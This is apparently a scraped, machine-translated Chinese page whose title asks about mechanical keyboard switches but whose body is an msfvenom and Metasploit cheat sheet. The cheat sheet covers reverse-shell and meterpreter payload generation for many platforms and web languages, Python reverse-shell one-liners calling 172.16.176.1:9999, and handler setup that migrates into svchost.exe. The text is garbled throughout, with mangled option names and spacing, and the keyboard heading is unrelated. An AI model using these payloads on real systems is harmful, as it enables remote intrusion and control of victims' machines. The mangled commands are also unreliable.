8种机械键盘轴体的比较
本人要买写代码的键盘,红轴和茶轴怎么选?
查看payloads : MSF venom-- list payloads
显示支持的文件格式: msfvenom --help-formats
查看payload所需参数: MSF venom-pxxx---- payload-options
编码参数-使用ex86/Shi kata _ ga _ nai-i5-b ' x00 '//Shi kata _ ga _ nai编码器进行五次编码,消除空格字符
一般payload windows/shell _ GTD wtd _ TCP
windows/meterpreter/gtdwtd_tcp
windows/meter preter/reverse _ TCP
windows/x64/meter preter/reverse _ TCP
Linux/x86/shell _ GTD wtd _ TCP
Linux/x86/meter preter _ reverse _ TCP
系统支付
linuxmsfvenom-p Linux/x86/meter preter/reverse _ tcpl host=xxxl port=XXX-felfshell.elf
windows
messageboxtestmsfvenom-ax86-p windows/messagebox text=' hello,it is a test '
在windows上生成32位/64位payload时需要小心。 MSF venom-ax86---platform windows-p windows/shell _ GTD wtd _ tcpl host=xxxl port=XXX-fexeshell.exe
MSF venom-p windows/meter preter/reverse _ tcpl host=xxxl port=XXX-fexeshell.exe
MSF venom-p windows/x64/meter preter/reverse _ tcpl host=xxxl port=XXX-fexeshell.exe
例如,在windows/meter preter/reverse _ TCP中,此payload的缺省值为32位。 也可以使用-a x86选项指定。
如果生成64位,则payload为windows/x64/meter preter/reverse _ TCP。
Netcat
nc正向连接MSF venom-p windows/shell _ hidden _ GTD wtd _ TCP rhost=192.168.0.107 lport=8956-fexe1. exe
nc反向连接,拦截MSF venom-p windows/shell _ reverse _ tcpl host=192.168.0.107 lport=888-fexe1. exe
macmsfvenom-POSx/x86/壳_ reverse _ tcpl host=xxxl port=XXX-FM acho壳. macho
androidmsfvenom-adalvik-p Android/meter preter/reverse _ tcpl host=xxxl port=XXX-frawshell.apk
Web Payloads
pppmsfvenom-pphp/meter preter _ reverse _ tcpl host=xxxl port=XXX-frawshell.PHP
cat shell.php | pbcopy echo '? PHP '|tr-d ' n ' shell.phppbpaste shell.PHP
aspmsfvenom-p windows/meter preter/reverse _ tcpl host=xxxl port=XXX-fasp shell.ASP
jspmsfvenom-p Java/JSP _ shell _ reverse _ tcpl host=xxxl port=XXX-fraw shell.JSP
warmsfvenom-p Java/JSP _ shell _ reverse _ tcpl host=xxxl port=XXX-fwarshell.war
pythonmsfvenom-pcmd/UNIX/reverse _ python lhost=xxxl port=XXX-frawshell.py
MSF venom-a python-p python/meter preter/reverse _ tcpl host=xxxl port=XXX-frawshell.py
shell python/python3- c ' importsocket,subprocess,os; s=socket.socket(socket.af_inet,socket.SOCK_STREAM ); s.connect((172.16.176.1 ),9999 ); OS.dup2(s.Fileno ),0 ); OS.dup2(s.Fileno ),1 ); OS.dup2(s.Fileno ),2 ); p=subprocess.call;' /gtdwt/bash ','-I ';'
python/python3- c ' exec (importsocket,subprocess; s=socket.socket (; s.connect((172.16.176.1 ),9999 ) ) n while 1: proc=subprocess.popen ) s.recv ),shell=True,shell s .
bashmsfvenom-pcmd/UNIX/reverse _ bash lhost=xxxl port=XXX-frawshell.sh
perlmsfvenom-pcmd/UNIX/reverse _ perl lhost=xxxl port=XXX-frawshell.pl
MSF拦截use exploit/multi/handler
设置支付
set RHOST
set RPORT
set LHOST
set LPORT
set exitonsession假
exploit -j -z
其他设定
AutoRunScript :自动执行脚本
例如,自动运行post/windows/manage/migrate模块并将其注入其他进程的setautorunscriptpost/windows/manage/migrate
自动注入过程设置预迁移真
setprependmigrateprocsvchost.exe
如果辅助配置set exitonsession false //,则已建立监听的端口将继续保持监听状态,并可以接受多个会话
获取set stagerverifysslcert false//shell时防止SSL_accept错误